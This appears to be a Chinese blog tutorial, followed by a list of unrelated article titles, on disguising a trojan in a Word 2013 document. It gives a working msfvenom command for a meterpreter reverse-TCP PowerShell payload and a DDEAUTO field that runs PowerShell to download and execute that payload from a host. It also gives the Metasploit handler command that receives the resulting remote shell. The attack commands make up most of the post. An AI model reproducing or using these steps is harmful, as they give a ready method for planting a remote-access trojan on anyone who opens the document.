Powershell配合word伪装木马执行
2024-09-03 18:46:46
环境:
win7 64位,word2013
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1
放到VPS上,这里我们放到本机搭建的apache环境中
win7中访问木马是否成功
打开word2013,设置域ctrl+F9
写入代码:
DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.37/x.ps1') "
命令通过powershell执行下载了VPS的x.ps1
监听payload
msf5 > handler -H 192.168.64.135 -P 1122 -p windows/x64/meterpreter/reverse_tcp
打开word文件,点击是
在后台弹出cmd
监听成功
最新文章
- OutofMemory之PermGen介绍
- DNG格式解析
- Linux:使用nohup让进程在后台可靠运行
- JQuery_表单选择器
- PHP面向对象中的重要知识点(三)
- [原创]java WEB学习笔记84:Hibernate学习之路-- -映射 一对一关系 ,基外键的方式实现
- rpm and yum commands
- substring函数——sql
- php实现无限级树型菜单(函数递归算法)
- @ManyToMany中间表附加字段设计
- intel安装mac os
- BZOJ 1613: [Usaco2007 Jan]Running贝茜的晨练计划
- JVM指令集(指令码、助记符、功能描述)(转)
- Angularjs 实现移动端在线测评效果
- 深入理解CSS3 Flexbox
- 【java】字节码操作技术
- C++ 构造与析构的执行顺序
- 如何让windows更高效?
- Jump Game II leetcode java
- 用于Web开发的8 个最好的跨平台编辑器